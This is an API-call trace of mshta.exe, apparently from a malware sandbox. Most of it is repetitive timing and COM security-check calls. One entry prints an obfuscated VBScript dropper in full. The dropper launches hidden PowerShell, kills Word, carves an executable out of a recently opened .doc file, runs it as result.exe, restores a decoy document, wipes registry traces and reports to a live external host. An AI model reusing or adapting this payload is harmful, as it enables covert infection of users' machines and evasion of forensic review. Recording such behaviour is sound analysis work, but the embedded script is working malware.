[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x20398
[0067.909] GetTickCount () returned 0x203a8
[0067.909] GetTickCount () returned 0x203a8
[0067.909] GetTickCount () returned 0x203a8
[0067.909] GetTickCount () returned 0x203a8
[0067.909] GetTickCount () returned 0x203a8
[0067.909] GetTickCount () returned 0x203a8
[0067.909] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.910] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.911] GetTickCount () returned 0x203a8
[0067.912] IUnknown:AddRef (This=0x27e180) returned 0x13
[0067.912] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x26afb0) returned 0x800c0011
[0067.912] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.912] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.912] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.912] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x2106, pPolicy=0x20f2f0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x20f2f0*=0x0) returned 0x0
[0067.912] IUnknown:Release (This=0x27e180) returned 0x12
[0067.912] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x20f560 | out: ppu=0x20f560) returned 0x0
[0067.912] IUnknown:AddRef (This=0x27e180) returned 0x13
[0067.912] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x26afb0) returned 0x800c0011
[0067.913] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.913] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.913] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.913] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x20f560, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x20f560*=0x0) returned 0x0
[0067.913] IUnknown:Release (This=0x27e180) returned 0x12
[0067.913] GetTickCount () returned 0x203a8
[0067.913] Sleep (dwMilliseconds=0x0)
[0068.053] GetTickCount () returned 0x20415
[0068.053] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x20f490 | out: ppu=0x20f490) returned 0x0
[0068.053] IUnknown:AddRef (This=0x27e180) returned 0x13
[0068.056] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x26afb0) returned 0x800c0011
[0068.057] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0068.057] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0068.057] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0068.057] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x20f490, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x20f490*=0x0) returned 0x0
[0068.057] IUnknown:Release (This=0x27e180) returned 0x12
[0068.057] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x20f3d0 | out: ppu=0x20f3d0) returned 0x0
[0068.057] IUnknown:AddRef (This=0x27e180) returned 0x13
[0068.057] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x26afb0) returned 0x800c0011
[0068.057] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0068.057] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0068.057] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0068.057] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x20f3d0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x20f3d0*=0x0) returned 0x0
[0068.057] IUnknown:Release (This=0x27e180) returned 0x12
[0068.058] FaultInIEFeature (in: hWnd=0x1021e, pClassSpec=0x20f3c0, pQuery=0x0, dwFlags=0x0 | out: pQuery=0x0) returned 0x1
[0068.058] CoCreateInstance (in: rclsid=0x20f3b0*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee0f847a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x20f390 | out: ppv=0x20f390*=0x40a4f0) returned 0x0
[0068.061] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20d570 | out: lpSystemTimeAsFileTime=0x20d570*(dwLowDateTime=0xd87eb3d0, dwHighDateTime=0x1d34cee))
[0068.061] GetCurrentProcessId () returned 0x370
[0068.061] GetCurrentThreadId () returned 0x628
[0068.061] GetTickCount () returned 0x20415
[0068.061] QueryPerformanceCounter (in: lpPerformanceCount=0x20d578 | out: lpPerformanceCount=0x20d578*=496797178) returned 1
[0068.061] __dllonexit () returned 0x7fee043bfc0
[0068.061] __dllonexit () returned 0x7fee043bfa8
[0068.062] __dllonexit () returned 0x7fee043bfd4
[0068.062] GetUserDefaultLCID () returned 0x409
[0068.062] GetVersion () returned 0x1db10106
[0068.062] GetUserDefaultLCID () returned 0x409
[0068.062] GetACP () returned 0x4e4
[0068.063] IUnknown:AddRef (This=0x27e180) returned 0x13
[0068.063] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x26afb0) returned 0x800c0011
[0068.063] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0068.063] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0068.063] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0068.063] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1401, pPolicy=0x20f260, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x20f260*=0x0) returned 0x0
[0068.063] IUnknown:Release (This=0x27e180) returned 0x12
[0068.063] GetCurrentThreadId () returned 0x628
[0068.063] GetCurrentThreadId () returned 0x628
[0068.063] GetCurrentThreadId () returned 0x628
[0068.063] GetCurrentThreadId () returned 0x628
[0068.064] GetCurrentThreadId () returned 0x628
[0068.064] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0068.064] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x20f140, cchData=6 | out: lpLCData="1252") returned 5
[0068.064] IsValidCodePage (CodePage=0x4e4) returned 1
[0068.064] GetCurrentThreadId () returned 0x628
[0068.064] GetCurrentThreadId () returned 0x628
[0068.064] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe1c0000
[0068.064] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CoCreateInstance") returned 0x7fefe1e7490
[0068.064] CoCreateInstance (in: rclsid=0x7fee048d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee048d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x40a838 | out: ppv=0x40a838*=0x2e8c60) returned 0x0
[0068.064] IUnknown:AddRef (This=0x2e8c60) returned 0x2
[0068.064] GetCurrentProcessId () returned 0x370
[0068.064] GetCurrentThreadId () returned 0x628
[0068.064] GetTickCount () returned 0x20415
[0068.064] ISystemDebugEventFire:BeginSession (This=0x2e8c60, guidSourceID=0x7fee048d5d8, strSessionName="VBScript:00000880:00001576:18132117") returned 0x0
[0068.064] GetCurrentThreadId () returned 0x628
[0068.064] GetCurrentThreadId () returned 0x628
[0068.065] GetCurrentThreadId () returned 0x628
[0068.065] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0068.065] GetCurrentThreadId () returned 0x628
[0068.065] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x2) returned 0x7fefde73480
[0068.065] StrCmpIW (psz1="http://www.samyrai777m.p-host.in/t/t.php?thread=0", psz2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0
[0068.065] GetCurrentThreadId () returned 0x628
[0068.065] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.066] _wcsicmp (_String1="", _String2="") returned 0
[0068.066] SysStringLen (param_1="\r\nWindow.ReSizeTo 0, 0\r\nWindow.moveTo -2000,-2000\r\nDim o,kw,cr1,cr2,ps,d,l,r,wv\r\nSet\x09o\x09=\x09CReAtEOBJECt\x09(\x09StrReverse(ChrW(&H57)) & StrReverse(ChrW(&H73)) & StrReverse(Chr(&H43)) & ChrW(&H72) & Chr(&H69) & StrReverse(Chr(&H50)) & StrReverse(Chr(&H74)) & Chr(&H2E) & ChrW(&H53) & StrReverse(Chr(&H48)) & StrReverse(Chr(&H65)) & StrReverse(Chr(&H4C)) & StrReverse(Chr(&H6C))\x09)\r\nwd=o.expAnDenvIRonMEnTStrings(\x09StrReverse(Chr(&H25)) & StrReverse(Chr(&H73)) & StrReverse(ChrW(&H59)) & ChrW(&H53) & StrReverse(Chr(&H74)) & ChrW(&H65) & StrReverse(ChrW(&H6D)) & Chr(&H52) & StrReverse(Chr(&H4F)) & StrReverse(Chr(&H4F)) & StrReverse(Chr(&H74)) & Chr(&H25)\x09)\r\nps= wd & Chr(&H5C) & StrReverse(ChrW(&H53)) & StrReverse(ChrW(&H59)) & ChrW(&H53) & Chr(&H74) & ChrW(&H65) & Chr(&H4D) & StrReverse(ChrW(&H33)) & StrReverse(ChrW(&H32)) & Chr(&H5C) & StrReverse(Chr(&H77)) & ChrW(&H69) & StrReverse(Chr(&H6E)) & ChrW(&H64) & StrReverse(Chr(&H6F)) & Chr(&H77) & Chr(&H73) & StrReverse(ChrW(&H70)) & StrReverse(ChrW(&H4F)) & StrReverse(Chr(&H77)) & Chr(&H65) & StrReverse(Chr(&H52)) & Chr(&H53) & Chr(&H48) & StrReverse(Chr(&H65)) & StrReverse(ChrW(&H4C)) & ChrW(&H4C) & StrReverse(ChrW(&H5C)) & StrReverse(Chr(&H56)) & StrReverse(Chr(&H31)) & ChrW(&H2E) & Chr(&H30) & ChrW(&H5C) & Chr(&H50) & Chr(&H6F) & ChrW(&H57) & Chr(&H45) & ChrW(&H72) & ChrW(&H53) & Chr(&H48) & ChrW(&H45) & Chr(&H4C) & StrReverse(ChrW(&H4C)) & StrReverse(ChrW(&H2E)) & StrReverse(Chr(&H45)) & StrReverse(Chr(&H78)) & Chr(&H65) & \" -WindowStyle Hidden \"\r\nkw = \"taskkill /f /im winword.exe;\"\r\nd=Chr(36)\r\nl=Chr(91)\r\nr=Chr(93)\r\ncr1=\"ri -Path \"\"\"\"\"\"HKCU:\\Software\\Microsoft\\Office\\\"\r\ncr2=\"\\Word\\Resiliency\"\"\"\"\"\" -recurse;\"\r\no.run ps & \"Try{\" & d & \"ada=\"\"\"\"\"\"\" & d & \"env:APPDATA\\result.exe\"\"\"\"\"\";\" & d & \"adax=\" & d & \"ada+'x';\" & d & \"f=\" & l & \"System.IO.File\" & r & \"::Create(\" &d & \"adax);\" & d & \"tmf=\"\"\"\"\"\"\" & d & \"env:TEMP\\o.tmp\"\"\"\"\"\";\" & kw & \"Function pr{Try{\" & d & \"k=\"\"\"\"\"\"HKCU:\\Software\\Microsoft\\Office\\\" &d & \"wv\" & \"\\Word\\Resiliency\\StartupItems\\\"\"\"\"\"\";\" & \"for (\" & d & \"i = 0; \" & d & \"i -lt 10; \" & d & \"i++){\" & d & \"r=\" & l & \"System.Text.Encoding\" & r & \"::Unicode.GetString((gp \" & d & \"k).((gi \" & d & \"k).Property\" & l & d & \"i\" & r & \"));if (\" & d & \"r.Contains('.doc')){\" & d & \"i=10;}}\"\x09& d & \"r=\" & d & \"r.Substring(\" & d & \"r.indexOf(':\\')-1);\" & d & \"r=\" & d & \"r.Substring(0, \" & d & \"r.IndexOf('.doc')+4);\" & cr1 & d & \"wv\" & cr2 & \"cp -Path \"& d &\"r -Destination \" & d & \"tmf\" & \";\" & d & \"d = (gc \" & d & \"tmf\" & \" -ReadCount 0 -encoding byte)\" & l & \"985480..1011591\" & r & \";Start-Sleep -s 1;sc \" & d & \"r -encoding byte -Value \" & d & \"d;\" & \"start winword \"\"\"\"\"\"\" & d & \"r\"\"\"\"\"\";\" & d & \"f = (gc \" & d & \"tmf\" & \" -ReadCount 0 -encoding byte)\" & l & \"420737..985472\" & r & \";sc \" & d & \"ada\" & \" -encoding byte -Value \" & d & \"f;\" & \"& \" & d & \"ada;\" & d & \"wc = New-Object system.Net.WebClient;\" & d & \"ht=\" & d & \"wc.d\" & \"ownl\" & \"oadS\" & \"tri\" & \"ng('http://www.samyrai777m.p-host.in/t/t.php?act=hit');\" & d & \"cd=(Resolve-Path .\\).Path;ri \"\"\"\"\"\"\" & d & \"cd\\*\"\"\"\"\"\" -include http*.pdb, http*.dll, *.cs;\" & \"}Catch{}};\" & d & \"wv='12.0';pr;\" & d & \"wv='14.0';pr;\" & d & \"wv='15.0';pr;\" & d & \"wv='16.0';pr;\" & \"Stop-Process -processname powershell;}Catch{exit;}\",0,true\r\nself.close\r\n") returned 0xccc
[0068.069] ISystemDebugEventFire:IsActive (This=0x2e8c60) returned 0x1
[0068.070] GetCurrentThreadId () returned 0x628
[0068.070] GetCurrentThreadId () returned 0x628
[0068.070] GetCurrentThreadId () returned 0x628
[0068.070] GetCurrentThreadId () returned 0x628
[0068.070] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.071] GetCurrentThreadId () returned 0x628
[0068.071] GetCurrentThreadId () returned 0x628
[0068.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.071] IsCharSpaceW (wch=0x6f) returned 0
[0068.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.071] IsCharSpaceW (wch=0x6f) returned 0
[0068.071] GetCurrentThreadId () returned 0x628
[0068.071] GetCurrentThreadId () returned 0x628
[0068.071] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.071] GetCurrentThreadId () returned 0x628
[0068.071] GetCurrentThreadId () returned 0x628
[0068.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.071] IsCharSpaceW (wch=0x6b) returned 0
[0068.071] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.071] IsCharSpaceW (wch=0x6b) returned 0
[0068.071] GetCurrentThreadId () returned 0x628
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] IsCharSpaceW (wch=0x63) returned 0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] IsCharSpaceW (wch=0x63) returned 0
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] IsCharSpaceW (wch=0x63) returned 0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] IsCharSpaceW (wch=0x63) returned 0
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] IsCharSpaceW (wch=0x70) returned 0
[0068.072] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.072] IsCharSpaceW (wch=0x70) returned 0
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.072] GetCurrentThreadId () returned 0x628
[0068.072] GetCurrentThreadId () returned 0x628
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] IsCharSpaceW (wch=0x64) returned 0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] IsCharSpaceW (wch=0x64) returned 0
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] IsCharSpaceW (wch=0x6c) returned 0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] IsCharSpaceW (wch=0x6c) returned 0
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] IsCharSpaceW (wch=0x72) returned 0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] IsCharSpaceW (wch=0x72) returned 0
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] GetCurrentThreadId () returned 0x628
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] IsCharSpaceW (wch=0x77) returned 0
[0068.073] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.073] IsCharSpaceW (wch=0x77) returned 0
[0068.074] GetCurrentThreadId () returned 0x628
[0068.074] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.074] GetCurrentThreadId () returned 0x628
[0068.074] GetCurrentThreadId () returned 0x628
[0068.074] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.074] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.074] GetCurrentThreadId () returned 0x628
[0068.074] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.074] GetCurrentThreadId () returned 0x628
[0068.074] GetCurrentThreadId () returned 0x628
[0068.075] IsWindowVisible (hWnd=0x1021a) returned 0
[0068.075] GetCurrentThreadId () returned 0x628
[0068.075] _wcsicmp (_String1="window", _String2="window") returned 0
[0068.075] GetCurrentThreadId () returned 0x628
[0068.075] GetCurrentThreadId () returned 0x628
[0068.075] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.075] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.075] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0068.075] GetCurrentThreadId () returned 0x628
[0068.075] GetCurrentThreadId () returned 0x628
[0068.075] IsWindowVisible (hWnd=0x1021a) returned 0
[0068.076] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe1c0000
[0068.076] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefe1da4c4
[0068.076] CLSIDFromProgIDEx (in: lpszProgID="WsCriPt.SHeLl", lpclsid=0x20e9c0 | out: lpclsid=0x20e9c0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0068.078] SysStringLen (param_1=0x0) returned 0x0
[0068.078] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CoGetClassObject") returned 0x7fefe1f2e18
[0068.078] CoGetClassObject (in: rclsid=0x20e9c0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee048e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20e990 | out: ppv=0x20e990*=0x40cbb0) returned 0x0
[0068.083] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20cc60 | out: lpSystemTimeAsFileTime=0x20cc60*(dwLowDateTime=0xd8837690, dwHighDateTime=0x1d34cee))
[0068.083] GetCurrentProcessId () returned 0x370
[0068.083] GetCurrentThreadId () returned 0x628
[0068.083] GetTickCount () returned 0x20434
[0068.084] QueryPerformanceCounter (in: lpPerformanceCount=0x20cc68 | out: lpPerformanceCount=0x20cc68*=496875902) returned 1
[0068.084] GetVersionExA (in: lpVersionInformation=0x20ca40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe52b2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe52a0000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x20ca40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0068.084] GetUserDefaultLCID () returned 0x409
[0068.084] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e7c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0068.084] lstrlenA (lpString="\\wscript.exe") returned 12
[0068.084] lstrlenA (lpString="C:\\Windows\\System32\\mshta.exe") returned 29
[0068.084] _strcmpi (_Str1="32\\mshta.exe", _Str2="\\wscript.exe") returned -41
[0068.084] _strcmpi (_Str1="32\\mshta.exe", _Str2="\\cscript.exe") returned -41
[0068.084] LoadRegTypeLib (in: rguid=0x7fee52b2df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x20e9b0 | out: pptlib=0x20e9b0*=0x304f10) returned 0x0
